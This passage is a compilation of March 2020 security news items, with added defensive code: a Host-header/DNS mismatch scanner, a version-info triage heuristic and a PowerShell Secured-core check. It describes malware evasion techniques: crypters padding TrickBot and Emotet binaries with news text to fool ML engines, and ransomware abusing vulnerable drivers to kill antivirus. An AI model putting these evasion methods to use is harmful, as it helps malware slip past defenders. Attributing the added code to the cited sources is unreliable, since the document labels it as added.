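    """Return one finding per request whose Host header disagrees with DNS."""
    rev = reverse_index(dns)
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # tolerate malformed lines rather than abort the scan
        verdict = check_host_header(m["dst"], m["host"], dns)
        if verdict:
            findings.append({
                "ts": m["ts"], "src": m["src"], "dst": m["dst"],
                "host": m["host"], "verdict": verdict,
                # names the destination address was actually resolved from
                "actual_names": sorted(rev.get(m["dst"], ())),
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG, DNS):
        print(f"{f['verdict']:10} {f['src']} -> {f['dst']} Host={f['host']} "
              f"actual={f['actual_names'] or '?'}")
```

The check only holds up when the DNS snapshot covers the same window as the proxy log; a stale snapshot turns ordinary CDN rotation into false mismatches.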
Previous research
The ‘runawy.exe’ binary file, its C2 server, and the unique string have been previously documented by researchers at other cyber security companies.

Cybereason’s Nocturnus team on February 12 published a technical analysis of the Spark backdoor, detailing the capabilities of the malware:

• Collect information about the victim host
• Encrypt collected data and send it to the attackers over the HTTP protocol
• Download other payloads
• Log keystrokes
• Record audio using the system’s built-in microphone
• Execute commands on the infected machine

At the beginning of the month, Palo Alto Networks detailed the same Enigma-packed runawy payload that was delivered with the help of a Word document on October 31 and November 2, 2019.

The Spark backdoor was initially documented by researchers at Beijing-based Qi An Xin cyber security company, with an English version of the research published on February 14, 2019.

Researchers from all these companies attribute the Spark backdoor to the MoleRATs group, known for using malware available on hacker forums. However, they also develop custom tools, such as Spark.


Google Prioritizes Security Updates After Halting Chrome Releases
22.3.2020  Bleepingcomputer  Security

Google has announced today that the release of future Chrome and Chrome OS versions is temporarily paused because of adjusted work schedules caused by employees having to work from home due to the novel coronavirus pandemic.

"Due to adjusted work schedules at this time, we are pausing upcoming Chrome and Chrome OS releases," the announcement published on the Chrome Releases blog says.

"Our primary objectives are to ensure they continue to be stable, secure, and work reliably for anyone who depends on them."

Chrome Developers (@ChromiumDev), 6:01 PM - Mar 18, 2020:
Due to adjusted work schedules, we’re pausing upcoming Chrome & Chrome OS releases. Our goal is to ensure they continue to be stable, secure, & reliable for anyone who depends on them. We’ll prioritize updates related to security, which will be included in Chrome 80. Stay tuned.

Focus on security updates for Chrome v80
The Google Chrome development team will continue to work remotely throughout the current novel coronavirus outbreak and will prioritize security updates that will be released as Chrome v80 updates.

"We’ll continue to prioritize any updates related to security, which will be included in Chrome 80," Google added.

As proof, Google Chrome 80.0.3987.149 was released right after the company announced that Chrome v81 was delayed, with security fixes patching 13 high severity vulnerabilities.

In a tweet from earlier today on the Chrome Developers Twitter account, users are encouraged to monitor the Chrome Releases Blog for new developments and any new info regarding upcoming Chrome and Chrome OS releases.

Chrome Developers (@ChromiumDev), 6:26 PM - Mar 18, 2020:
Please keep an eye on the Chrome Release Blog - https://chromereleases.googleblog.com/ - for updates and additional info.

Chrome v81 announcement posts removed
Google Chrome v81 was supposed to start rolling out on March 17th according to a post initially published on the Google Developers blog yesterday.

The new Chrome version should have included support for form elements featuring a modernized look, hit testing for augmented reality, app icon badge support, and initial support for Web NFC.

A full list of Chrome 81 feature deprecations and removals is also available on the Chrome Platform Status page.

Google Play Console warning (AndroidPolice)
On Monday, Google also informed Android developers that they will be experiencing longer than normal app review times due to adjusted work schedules.

As the developers were warned, some of their apps will go through the review process in seven days or more starting this week as reported by AndroidPolice.

"Due to adjusted work schedules at this time, we are currently experiencing longer than usual review times," a Google spokesperson said. "While the situation is currently evolving, app review times may fluctuate, and may take 7 days or longer."


Trickbot, Emotet Malware Use Coronavirus News to Evade Detection
22.3.2020  Bleepingcomputer  Virus

The TrickBot and Emotet Trojans have started to add text from Coronavirus news stories in an attempt to bypass security software that uses artificial intelligence and machine learning to detect malware.

Before malware is distributed in phishing campaigns or other attacks, developers commonly use a program called a 'crypter' to obfuscate or encrypt the malicious code.

This is done in the hopes that it makes the malware appear to be harmless and thus FUD (Fully UnDetectable) to antivirus software.

This was shown to be particularly useful against security software that utilizes machine-learning or artificial intelligence to detect malicious programs.

TrickBot, Emotet use text from Coronavirus news stories
In January 2020, it was discovered that crypters for the TrickBot and Emotet Trojans were using text from news stories about President Trump's impeachment.

This week, BleepingComputer discovered that the crypters for TrickBot and Emotet have switched to news stories about the Coronavirus pandemic.

For example, TrickBot samples seen by BleepingComputer utilize strings taken from CNN news stories as part of the malware's file description.

Copyright: passengers were sent to government quarantine centers
Product: The restrictions will ban travel to the US from 26 European countries
Description: Singapore has 187 confirmed cases of the virus
Original Name: Just because someone who had the coronavirus
Internal Name: Just this week, the Grand Princess cruise ship docked
File Version: 1.0.0.1

We also saw an Emotet sample that uses strings from a CNN news story for its file information.

Copyright: different times than the WHO
Product: The spike is partly due to a broader definition
Description: These numbers are cumulative since Jan. 21 and include people with travel history to China
Original Name: n Wednesday, China reported far fewer cases of the novel coronavirus
Internal Name: Two California cases and the Texas case are among evacuees from China
File Version: 1, 0, 0, 1

This information is then shown in the Details tab of the malware's properties as shown below.

File properties for new TrickBot and Emotet samples
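The "goodware" strings above also give defenders a cheap triage signal: legitimate binaries carry short identifiers in their version-info fields, not news sentences. The Python below is an added example, not code from BleepingComputer or SentinelLabs; it assumes the VS_VERSIONINFO string table has already been extracted from the PE resource (for instance with the pefile library) into a dict keyed by the standard field names, the two malware samples reuse the strings quoted in the article, and the benign sample is constructed.

```python
import re
from typing import Dict, List, Tuple

# Function words that are common in English prose but rare in product metadata
STOPWORDS = {"the", "a", "an", "of", "to", "from", "are", "were", "is", "was",
             "has", "have", "had", "who", "this", "that", "and", "in", "on",
             "with", "since", "than", "because", "by", "due"}

# Fields that are short identifiers (a few words at most) in legitimate binaries
IDENTIFIER_FIELDS = {"InternalName", "OriginalFilename"}
# Fields worth scoring at all; the rest (FileVersion etc.) are numeric or free-form
SCORED_FIELDS = IDENTIFIER_FIELDS | {"CompanyName", "ProductName",
                                     "FileDescription", "LegalCopyright"}
MIN_WORDS, MIN_STOP_RATIO, MAX_IDENT_WORDS = 5, 0.25, 3


def _words(text: str) -> List[str]:
    return re.findall(r"[a-z0-9']+", text.lower())


def score_version_info(info: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (field, reason) pairs for version-info strings that look like
    prose pasted in by a crypter rather than product metadata."""
    findings = []
    for field, value in info.items():
        if field not in SCORED_FIELDS:
            continue
        words = _words(value)
        stops = sum(w in STOPWORDS for w in words)
        # A long string dense in function words reads like a sentence
        if len(words) >= MIN_WORDS and stops / len(words) >= MIN_STOP_RATIO:
            findings.append((field, "reads like a sentence"))
        if field in IDENTIFIER_FIELDS and len(words) > MAX_IDENT_WORDS:
            findings.append((field, "too many words for an identifier"))
        if field == "OriginalFilename" and not re.search(
                r"\.(exe|dll|sys|ocx|scr)$", value.strip(), re.I):
            findings.append((field, "no executable extension"))
    return findings


def flagged_fields(info: Dict[str, str]) -> List[str]:
    return sorted({field for field, _ in score_version_info(info)})


# Strings quoted in the article, mapped to the VERSIONINFO keys behind the
# Explorer "Details" labels (Copyright -> LegalCopyright, Product -> ProductName, ...)
TRICKBOT_SAMPLE = {
    "LegalCopyright": "passengers were sent to government quarantine centers",
    "ProductName": "The restrictions will ban travel to the US from 26 European countries",
    "FileDescription": "Singapore has 187 confirmed cases of the virus",
    "OriginalFilename": "Just because someone who had the coronavirus",
    "InternalName": "Just this week, the Grand Princess cruise ship docked",
    "FileVersion": "1.0.0.1",
}
EMOTET_SAMPLE = {
    "LegalCopyright": "different times than the WHO",
    "ProductName": "The spike is partly due to a broader definition",
    "FileDescription": "These numbers are cumulative since Jan. 21 and include people with travel history to China",
    "OriginalFilename": "n Wednesday, China reported far fewer cases of the novel coronavirus",
    "InternalName": "Two California cases and the Texas case are among evacuees from China",
    "FileVersion": "1, 0, 0, 1",
}
# Constructed benign metadata in the style of a signed Windows binary
BENIGN_SAMPLE = {
    "CompanyName": "Microsoft Corporation",
    "ProductName": "Microsoft® Windows® Operating System",
    "FileDescription": "Notepad",
    "OriginalFilename": "NOTEPAD.EXE",
    "InternalName": "Notepad",
    "LegalCopyright": "© Microsoft Corporation. All rights reserved.",
    "FileVersion": "10.0.18362.1",
}

if __name__ == "__main__":
    for name, sample in [("trickbot", TRICKBOT_SAMPLE), ("emotet", EMOTET_SAMPLE),
                         ("benign", BENIGN_SAMPLE)]:
        print(name, score_version_info(sample))
```

This is a triage heuristic for prioritising samples, not a verdict; localized software and long copyright notices will need the thresholds tuned against your own clean corpus.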
It is not known if the use of these strings has been of any benefit to the threat actors, but Vitali Kremez, Head of SentinelLabs, thinks it could be useful against AI/ML security engines.

"By and large, the Coronavirus strings being used by the malware crypter generator deploy public news content as a methodology to frustrate certain machine learning static file parser methodologies. This "goodware" string addition technique allows the criminal crypter operators to create crypted binaries that might allow bypasses of AI/ML engines of certain anti-virus products as it was proved in the Cylance bypass method," Kremez told BleepingComputer via email.

The use of Coronavirus (COVID-19) as part of malware attacks has steeply increased since the outbreak with new phishing scams, ransomware, and malware being deployed.

Everyone should be wary of any emails that they receive, especially those with unsolicited attachments about the Coronavirus.

Update 3/18/20: MalwareHunterTeam told BleepingComputer that this change started about a month ago.


How to Change the Default Search Engine in Microsoft Edge
22.3.2020  Bleepingcomputer  OS

Microsoft allows Microsoft Edge users to change the default search engine from Bing to another one of their choice, including custom search engines.

When switching search engines, users can select from a variety of pre-configured search engines such as Bing, Yahoo, Google, DuckDuckGo, and Ecosia or create their own.

This article will explain how to switch the search engine for the address bar to a pre-configured one or a custom one that you create.

How to switch the Edge address bar search to another search engine
If you do not wish to use Bing as the default search engine for address bar searches, you can change to another search engine following these steps:

When in Microsoft Edge, go to Settings > Privacy and services > Address Bar.
In the drop-down menu labeled "Search engine used in the address bar", select the search engine you wish to use.
Select search engine used in the address bar
You can now close the settings tab.
After making the change, when you search from the Edge address bar the newly selected search engine will be used instead of Bing.

Manage existing or create new search engines
If a search engine that you wish to use does not exist, you can also create custom search engines to be used as the default address bar search or for using tagged searches, which we will describe below.

To create a custom search engine in Edge, follow these steps:

When in Microsoft Edge, go to Settings > Privacy and services > Address Bar > Manage Search Engines.
You will now be at a page showing all of the configured search engines in Microsoft Edge.

Each search engine consists of a name, a keyword that can be used in the address bar to use that search engine, and the URL that will be used to perform a search.
List of pre-configured search engines
To add a custom search engine, click on the Add button and you will be shown a form asking for various information.

The Search Engine field is simply the name that will be shown when selecting a search engine, the Keyword field is used to perform searches with the engine from the address bar, and the URL is the page on the site that will return the search results.
Create a custom search engine
When entering the URL to use for the search query, the variable that accepts the searched-for keyword should be replaced with a %s as shown above.
When done, click on the Save button and the new search engine will be created; it can then be used in the address bar or selected as the default search engine in Edge.

Using keywords to search using custom search engines
As seen above, when we made a custom search engine, we entered the keyword 'bleepingcomputer' that can be used for tagged searches from the address bar.

For example, even if the default search engine used for address bar searches is set to Bing, we can still search from any other configured search engine by using its keyword.

To do this, we type the assigned keyword in the address bar and then press the Tab key on the keyboard to search directly in that search engine.

Search using Search Engine Keywords
The other pre-configured search engine keywords that can be used are bing.com, google.com, yahoo.com, duckduckgo.com, and ecosia.org. These keywords can be changed in the 'Manage Search Engines' screen.


Microsoft Scales Back Office 365 Features to Handle High Loads
22.3.2020  Bleepingcomputer  OS

Microsoft is currently scaling down select non-essential Office 365 capabilities in response to the growth in demand and the influx of new Microsoft 365 users caused by the novel coronavirus (COVID-19) pandemic.

According to the MC206581 announcement recently posted to the Office 365 Admin message center, several changes will be made to prevent users from experiencing outages or issues caused by the high load.

"To best support our Microsoft 365 customers worldwide and accommodate new growth and demand during these unprecedented times, we're making temporary adjustments to select non-essential capabilities," the message reads.

"We do not expect these changes to have significant impact on the end users experience but wanted to make you aware."

MC206581 announcement (Microsoft)
Among the features that will get adjusted to lower the load on Microsoft 365 servers, Redmond intends to change:

• how often we check for presence
• the interval in which we show when the other party is typing
• video resolution

Microsoft will tweak these temporary feature adjustments as the situation changes, and the load on the Microsoft 365 servers is expected to wind down as users move away from remote working from home.

"Microsoft is actively monitoring performance and usage trends to ensure we're optimizing service for our customers worldwide, and accommodating new growth and demand," a Microsoft spokesperson told BleepingComputer when asked about the cause of these recent developments.

"At the same time, these are unprecedented times and we’re also looking at what steps we can take to proactively prepare for these high-usage periods."

While there was no mention of it, this announcement comes after an outage of Microsoft Teams, the teamwork hub in Office 365, that affected EU and some US users between March 16 and March 17, with reports saying that chat messages weren't being sent, team member management wasn't working, and the admin portal was unreliable.

Microsoft 365 Status (@MSFT365Status), 9:50 AM - Mar 16, 2020:
We're investigating messaging-related functionality problems within Microsoft Teams. Please refer to TM206544 in your admin center for further details. ^JP

Even though the issues were thought to be mitigated on March 16 at 5:58 AM, the problems came back about two hours later at 7:46 AM and again at 2:01 AM the next day, after another attempted mitigation by rerouting user connections to alternate systems.

The issue was finally resolved later on March 17 and it was determined that it was a caching issue within a component of the Microsoft Teams infrastructure.

Microsoft announced on March 5th that Microsoft Teams is free for the next six months to help businesses move towards a remote workplace during the COVID-19 outbreak.

"At Microsoft, the health and safety of employees, customers, partners and communities is our top priority," Microsoft EVP and President JP Courtois stated on Twitter. "By making Teams available to all for free for six months, we hope that we can support public health and safety by making remote work even easier."


Emsisoft, Coveware Offer Free Ransomware Help During Coronavirus Outbreak
22.3.2020  Bleepingcomputer  Ransomware

Emsisoft and Coveware have announced that they will be offering their ransomware decryption and negotiation services for free to healthcare providers during the Coronavirus outbreak.

With medical facilities, hospitals, and labs already being over capacity and employees working in stressful and dangerous environments, they need all the help they can get.

Unfortunately, some online threat groups and ransomware operators see this as an optimal time to launch attacks on these organizations when they are at their most vulnerable.

This is shown in recent attacks against the United States Health and Human Services Department's HHS.gov site, Illinois Champaign County Public Health Department, and the University Hospital Brno in the Czech Republic.

Giving back when they need it the most
Starting today, Emsisoft and Coveware will offer their ransomware related services to healthcare providers for free.

“This is the worst possible time for a healthcare provider to be impacted by ransomware. We want to ensure that they’re able to return to normal operations as quickly as possible so that patient care is minimally disrupted. We’re all in this together, and both companies and individuals need to be doing whatever they can to help each other,” Emsisoft's Brett Callow told BleepingComputer via email.

Emsisoft offers custom decryption services for customers who find that paid-for decryptors do not work, or where an exploitable weakness is found in a ransomware strain that must be worked on a case-by-case basis.

For those who find that they need to pay a ransom, Coveware provides negotiation services that can dramatically reduce the demanded ransoms in many cases.

"We have helped hospitals through ransomware attacks during normal times. It is a horrible situation with normal patient activity. It's unfathomable to think about what it would be like during a pandemic. We want to ensure providers have fast access to help with as little friction as possible. It is the least we can do," Coveware CEO Bill Siegel told BleepingComputer.

As part of this offer, the following services will be offered by Emsisoft and Coveware for free to healthcare providers.

• Technical analysis of the ransomware.
• Development of a decryption tool whenever possible.
• As a last resort, ransom negotiation, transaction handling and recovery assistance, including replacement of the decryption tool supplied by the criminals with a custom tool that will recover data faster and with less chance of data loss.


Adobe Fixes Nine Critical Vulnerabilities in Reader, Acrobat
22.3.2020  Bleepingcomputer  Vulnerability

Adobe has released security updates for Adobe Acrobat and Adobe Reader that fix numerous vulnerabilities ranging from information disclosure to arbitrary code execution.

Adobe usually releases security updates in conjunction with Microsoft's Patch Tuesday security updates, but this month nothing was released at that time.

Today, Adobe has released security updates that fix 13 vulnerabilities, with 4 rated as 'Important' as they lead to information disclosure or privilege escalation.

The other 9 are rated as 'Critical' because an attacker could craft malicious PDFs, or take other malicious actions, that exploit these vulnerabilities to execute commands on the affected computer.

13 vulnerabilities fixed
The vulnerabilities fixed in 'Security Bulletin for Adobe Acrobat and Reader | APSB20-13' security updates are:

Vulnerability Category                     Vulnerability Impact      Severity   CVE Number
Out-of-bounds read                         Information Disclosure    Important  CVE-2020-3804, CVE-2020-3806
Out-of-bounds write                        Arbitrary Code Execution  Critical   CVE-2020-3795
Stack-based buffer overflow                Arbitrary Code Execution  Critical   CVE-2020-3799
Use-after-free                             Arbitrary Code Execution  Critical   CVE-2020-3792, CVE-2020-3793, CVE-2020-3801, CVE-2020-3802, CVE-2020-3805
Memory address leak                        Information Disclosure    Important  CVE-2020-3800
Buffer overflow                            Arbitrary Code Execution  Critical   CVE-2020-3807
Memory corruption                          Arbitrary Code Execution  Critical   CVE-2020-3797
Insecure library loading (DLL hijacking)   Privilege Escalation      Important  CVE-2020-3803

Adobe recommends users upgrade to the latest versions of Acrobat DC, Acrobat Reader DC, Acrobat 2017, Acrobat Reader 2017, Acrobat 2015, and Acrobat Reader 2015.


VMware Fixes High Severity Privilege Escalation Bug in Fusion
22.3.2020  Bleepingcomputer  Vulnerability

VMware today released security updates to address a high severity privilege escalation vulnerability and a denial-of-service (DoS) vulnerability in VMware Workstation, Fusion, VMware Remote Console and Horizon Client.

The two security flaws, tracked as CVE-2020-3950 and CVE-2020-3951, are due, respectively, to the improper use of setuid binaries and to a heap-overflow issue in Cortado Thinprint.

Fixed bugs could lead to privilege escalation and DoS attacks
CVE-2020-3950, reported by Jeffball of GRIMM and Rich Mirch, was rated by VMware with a CVSSv3 base score of 7.3 and evaluated to be in the Important severity range.

This flaw impacts the VMware Fusion (11.x before 11.5.2), VMware Remote Console for Mac (11.x and prior before 11.0.1) and Horizon Client for Mac (5.x and prior before 5.4.0) macOS apps.

"Successful exploitation of this issue may allow attackers with normal user privileges to escalate their privileges to root on the system where Fusion, VMRC or Horizon Client is installed," explains VMware's security advisory.

The denial of service vulnerability found in Cortado Thinprint and reported by FireEye's Dhanesh Kizhakkinan affects the VMware Workstation (15.x before 15.5.2) Windows and Linux apps, as well as the Horizon Client for Windows (5.x and prior before 5.4.0).

"Attackers with non-administrative access to a guest VM with virtual printing enabled may exploit this issue to create a denial-of-service condition of the Thinprint service running on the system where Workstation or Horizon Client is installed," as described by VMware.

To fix the two security issues, you have to apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' available in the VMSA-2020-0005 advisory.

Critical Guest-to-Host DoS bug fixed last week
Last week, VMware also patched a critical use-after-free vmnetdhcp vulnerability in VMware Workstation (15.x before 15.5.2) and Fusion (11.x before 11.5.2) that could lead to code execution on the host system from the guest environment when exploited.

This security flaw was found by an anonymous Trend Micro Zero Day Initiative researcher in the Windows vmnetdhcp service, which is used to assign IP addresses to the guest host via the Dynamic Host Configuration Protocol (DHCP).

The flaw tracked as CVE-2020-3947 could also allow potential attackers to create a denial-of-service condition of the vmnetdhcp service running on unpatched host machines.

Due to this vulnerability's critical nature, it is strongly recommended that users upgrade their VMware Workstation software to version 15.5.2 as soon as possible to prevent future attacks.

Update March 18, 13:48 EDT: Security researcher Rich Mirch told BleepingComputer that the latest released VMware Fusion 15.5.2 doesn't fix the CVE-2020-3950 EoP vulnerability. VMware says that they are aware and working on a new update.

Update March 19, 09:15 EDT: VMware has published KB78294 with additional instructions to be applied to mitigate exploitation of the CVE-2020-3950 VMware Fusion setuid security vulnerability. The next release of Fusion will contain a complete fix.


Firefox Password Manager To Be Secured With Windows 10 Credentials
22.3.2020  Bleepingcomputer  Safety

Mozilla is making changes to the Firefox Lockwise password manager so that users will need to enter their Windows 10 credentials before being allowed to edit or view saved logins.

One of the biggest problems with browser password managers is that they offer no protection from a person who gains local access to a PC.

Once a person has access to a PC, and thus to its owner's browser, they can easily access the saved login credentials without being prompted to enter a password or other credentials.

Windows 10 credentials used to secure Lockwise
To resolve this, in the latest Mozilla Firefox Nightly build 76.0a1, when a Windows user attempts to view, copy, or edit saved login credentials in the Lockwise password manager, they will first be prompted to enter their Windows 10 login credentials.

Lockwise prompt for Windows 10 credentials
If a user does not know the password, PIN, or other configured authentication credentials, Firefox will not allow the user to view the credentials.

This method effectively secures the Lockwise password manager so that a local user cannot read through the machine owner's saved credentials.

The only caveat is if a user plans on looking up their credentials for numerous accounts in a row, they will currently need to enter their Windows 10 credentials each time.


US Commerce Dept Shares Tips On Securing Virtual Meetings
21.3.2020  Bleepingcomputer  BigBrothers

The US National Institute of Standards and Technology (NIST) today shared a number of measures that should be taken by remote workers to prevent eavesdropping and protect their privacy during virtual meetings while working from home during the current COVID-19 pandemic.

Jeff Greene, the director of the National Cybersecurity Center of Excellence (NCCoE) at NIST, said that "if virtual meetings are not set up correctly, former coworkers, disgruntled employees, or hackers might be able to eavesdrop."

"Using some basic precautions can help ensure that your meetings are an opportunity to collaborate and work effectively – and not the genesis of a data breach or other embarrassing and costly security or privacy incident."

Boost your online meetings' security
Greene suggests taking advantage of your conferencing software's built-in security features, as well as of suggestions provided by their developers to boost virtual meetings' security.

NCCoE's director recommends considering multi-factor authentication (MFA) whenever available and to make use of a dashboard to keep a close eye on your meeting's attendees.

He also advises limiting the reuse of meeting access codes and enabling notifications when attendees join, so that anyone who shouldn't be attending can be identified quickly.

The list of measures to be taken to prevent eavesdropping by unauthorized parties according to the NIST:

• Follow your organization’s policies for virtual meeting security.
• Limit reuse of access codes; if you’ve used the same code for a while, you’ve probably shared it with more people than you can imagine or recall.
• If the topic is sensitive, use one-time PINs or meeting identifier codes, and consider multi-factor authentication.
• Use a “green room” or “waiting room” and don’t allow the meeting to begin until the host joins.
• Enable notification when attendees join by playing a tone or announcing names. If this is not an option, make sure the meeting host asks new attendees to identify themselves.
• If available, use a dashboard to monitor attendees – and identify all generic attendees.
• Don’t record the meeting unless it’s necessary.
• If it’s a web meeting (with video):
- Disable features you don’t need (like chat or file sharing).
- Before anyone shares their screen, remind them not to share other sensitive information during the meeting inadvertently.
When you know that sensitive information will be shared between the attendees of a specific virtual meeting, you can also take the following additional measures to further increase security:

• Using only approved virtual meeting services.
• Issuing unique PINs or passwords for each attendee and instructing them not to share them.
• Using a dashboard feature so you can see who all the attendees are at any time.
• Locking the call once you have identified all the attendees and lines in use.
• Encrypting recordings, requiring a passphrase to decrypt them, and deleting recordings stored by the provider.
• Only conducting web meetings on organization-issued devices.
NIST provides a separate collection of telework security resources designed to assist remote workers including a guide to enterprise telework and BYOD security, an infographic on securing conference calls, guidance on mobile security, and security configurations and checklists.

CISA tips on securing enterprise VPNs
The DHS Cybersecurity and Infrastructure Security Agency (CISA) also shared tips on how to secure enterprise virtual private networks (VPNs) in response to the increasing number of employees working from home in response to the current COVID-19 pandemic.

CISA advised organizations to keep their VPN software, network devices, and user devices up to date, to alert their employees of any phishing attacks, as well as to make sure that their security teams are up to speed when it comes to security incident detection and response.

CISA also recommended implementing MFA on VPN connections, or at least requiring users to choose strong passwords, as a defense measure against attacks.

Enterprises were also encouraged to test their VPN infrastructure in advance to assess its capability to support an increased number of users.

As part of its teleworking guidance, the DHS cybersecurity agency also suggested reviewing CISA documentation on how to secure network infrastructure devices, avoid social engineering and phishing attacks, as well as to choose, protect and supplement passwords.

To assist the wave of new remote workers, software developers and service providers including Google, Microsoft, Adobe, Zoom, and LogMeIn are also offering free licenses or enhanced versions of their software and services during the coronavirus disease outbreak.


Windows 10 Secured-Core PCs Can Block Driver-Abusing Malware
21.3.2020 
Bleepingcomputer  Virus

Microsoft says that Windows 10 Secured-core PCs can successfully defend their users against malware designed to take advantage of driver security flaws to disable security solutions.

"Multiple malware attacks, including RobbinHood, Uroburos, Derusbi, GrayFish, and Sauron, and campaigns by the threat actor STRONTIUM, have leveraged driver vulnerabilities (for example, CVE-2008-3431, CVE-2013-3956, CVE-2009-0824, CVE-2010-1592, etc.) to gain kernel privileges and, in some cases, effectively disable security agents on compromised machines," Microsoft says.

However, according to Microsoft, endpoint devices can be defended against such attacks if you are using a Secured-core PC, which comes with built-in protection against firmware attacks, a technique increasingly used by both state-sponsored hacking groups and commodity malware.

Secured-core PCs were released as a solution to the increasing number of firmware security issues that attackers can exploit to bypass a Windows machine's Secure Boot, as well as to the lack of visibility at the firmware level common in today's endpoint security solutions.

Malware abusing vulnerable firmware and drivers
"In addition to vulnerable drivers, there are also drivers that are vulnerable by design (also referred to as 'wormhole drivers'), which can break the security promise of the platform by opening up direct access to kernel-level arbitrary memory read/write, MSRs," Microsoft adds.

"In our research, we identified over 50 vendors that have published many such wormhole drivers. We actively work with these vendors and determine an action plan to remediate these drivers."

One instance of a threat actor abusing firmware vulnerabilities is the Russian-backed APT28 cyber-espionage group (also tracked as Tsar Team, Sednit, Fancy Bear, Strontium, and Sofacy) who used a Unified Extensible Firmware Interface (UEFI) rootkit dubbed LoJax during some of its 2018 operations.

More recently, the operators behind the RobbinHood Ransomware exploited a vulnerable GIGABYTE driver to elevate privileges and install malicious unsigned Windows drivers that allowed them to terminate antivirus and security software processes on compromised systems.

RobbinHood Ransomware attack chain (Microsoft)
"In this attack scenario, the criminals have used the Gigabyte driver as a wedge so they could load a second, unsigned driver into Windows," Sophos researchers explained at the time.

"This second driver then goes to great lengths to kill processes and files belonging to endpoint security products, bypassing tamper protection, to enable the ransomware to attack without interference."

This tactic enabled the attackers to circumvent anti-ransomware defenses by killing the antivirus software before deploying the ransomware executable used to encrypt the victim's documents.

Sophos has not yet been able to fully analyze this ransomware sample, so the processes and services being targeted are currently unknown.

Secured-core PCs feature built-in protection
As Microsoft says, however, Windows 10 comes with hardware and firmware protection features that can successfully fight against attacks such as the ones that infected victims with LoJax and RobbinHood Ransomware.

Moreover, Secured-core PCs, introduced by Microsoft in October 2019 in partnership with OEM partners Lenovo, HP, Dell, Panasonic, Dynabook, and Getac, can block firmware-level attacks because they ship with these hardware-backed security features enabled by default, which removes the need for users to change the required BIOS and OS settings manually.

"Because both BIOS settings and OS settings are enabled out of the box with these devices, the burden to enable these features onsite is removed for customers," Microsoft adds, with the following features enabled on all Secured-core PCs:

Security promise                                        Technical features
Protect with hardware root of trust                     TPM 2.0 or higher
                                                        TPM support enabled by default
                                                        Virtualization-based security (VBS) enabled
Defend against firmware attack                          Windows Defender System Guard enabled
Defend against vulnerable and malicious drivers         Hypervisor-protected code integrity (HVCI) enabled
Defend against unverified code execution                Arbitrary code generation and control flow hijacking protection [CFG, xFG, CET, ACG, CIG, KDP] enabled
Defend against limited physical access, data attacks    Kernel DMA protection enabled
Protect identities and secrets from external threats    Credential Guard enabled
However, users of other devices can also take advantage of similar protection if they configure their hardware and Windows security features correctly.

"Specifically, the following features need to be enabled: Secure boot, HVCI (enables VBS), KDP (automatically turned on when VBS is on), KDMA (Thunderbolt only) and Windows Defender System Guard," Microsoft explains.

"With Secured-core PCs, however, customers get a seamless chip to cloud security pattern that starts from a strong hardware root of trust and works with cloud services and Microsoft Defender ATP to aggregate and normalize the alerts from hardware elements to provide end-to-end endpoint security."
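For users of non-Secured-core devices who want to verify the features Microsoft lists above, the following PowerShell check is an added example (not Microsoft's code or tooling). It reads the Win32_DeviceGuard WMI class and Confirm-SecureBootUEFI; it assumes the documented Win32_DeviceGuard service codes, reports System Guard through its Secure Launch component, and does not check Kernel DMA protection, which has no WMI field the author knows of.

```powershell
# Added example, not Microsoft's code: report which of the protections named in the article
# (Secure Boot, VBS, HVCI, Credential Guard, System Guard) are actually running on this machine.
# Run from an elevated PowerShell prompt; Confirm-SecureBootUEFI needs administrator rights.
function Get-SecuredCoreFeatureStatus {
    [CmdletBinding()]
    param()

    # Win32_DeviceGuard reports VBS state and the VBS-backed security services.
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName 'Win32_DeviceGuard'

    # Documented SecurityServicesRunning codes (assumption that this mapping is current):
    # 1 = Credential Guard, 2 = HVCI, 3 = System Guard Secure Launch, 4 = SMM Firmware Measurement.
    $running = @($dg.SecurityServicesRunning)

    # VirtualizationBasedSecurityStatus: 0 = not enabled, 1 = enabled but not running, 2 = running.
    $vbsRunning = ($dg.VirtualizationBasedSecurityStatus -eq 2)

    # Confirm-SecureBootUEFI throws on legacy BIOS systems; treat that as "not enabled".
    try { $secureBoot = [bool](Confirm-SecureBootUEFI) } catch { $secureBoot = $false }

    [PSCustomObject]@{
        SecureBoot              = $secureBoot
        VbsRunning              = $vbsRunning
        Hvci                    = ($running -contains 2)
        CredentialGuard         = ($running -contains 1)
        # Secure Launch is the part of Windows Defender System Guard that Win32_DeviceGuard exposes.
        SystemGuardSecureLaunch = ($running -contains 3)
        # The article states KDP is turned on automatically when VBS is on, so it is derived from VBS.
        KdpImplied              = $vbsRunning
    }
}

function Test-SecuredCoreBaseline {
    # Returns the names of the listed features that are NOT running; an empty result means the
    # device matches the configuration Microsoft describes for non-Secured-core hardware.
    $s = Get-SecuredCoreFeatureStatus
    $missing = @()
    if (-not $s.SecureBoot)              { $missing += 'Secure Boot' }
    if (-not $s.VbsRunning)              { $missing += 'VBS' }
    if (-not $s.Hvci)                    { $missing += 'HVCI' }
    if (-not $s.SystemGuardSecureLaunch) { $missing += 'Windows Defender System Guard (Secure Launch)' }
    if (-not $s.CredentialGuard)         { $missing += 'Credential Guard' }
    return ,$missing
}

# Usage
Get-SecuredCoreFeatureStatus | Format-List
$missing = Test-SecuredCoreBaseline
if ($missing.Count -eq 0) { 'All listed protections are running.' }
else                      { "Not running: $($missing -join ', ')" }
```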


Windows Terminal v0.10 Released with Mouse Input Support
21.3.2020 
Bleepingcomputer  OS

Microsoft has released Windows Terminal v0.10 for Windows 10 that includes some very useful features including full mouse input support and the ability to split a screen by using a keyboard combination.

With this release, Microsoft has added full mouse input support so that you can use terminal programs that support the mouse, such as Midnight Commander (shown below), tmux, and others.

With this support, you can simply click on a button, file, or screen with your mouse to switch between them as shown by the image below.

Mouse Support in Midnight Commander
To use the mouse to select text for copying, you need to hold down the Shift key while selecting the text.

Microsoft has also added support for a split-screen keybinding that allows you to easily split the currently selected terminal session.

To do this you would add the "duplicate" option to a keybinding that issues the "splitPane" command. An example keybinding that sets the Ctrl+Shift+D keyboard combination to perform this command is seen below.

"keybindings": [
{"keys": ["ctrl+shift+d"], "command": {"action": "splitPane", "split": "auto", "splitMode": "duplicate"}}
]
Illustrating the duplicate option of splitPane
This release also fixes the following bugs:

The text behavior when it reflows on resizing of the window is significantly improved!
The borders when using dark themes aren’t white anymore!
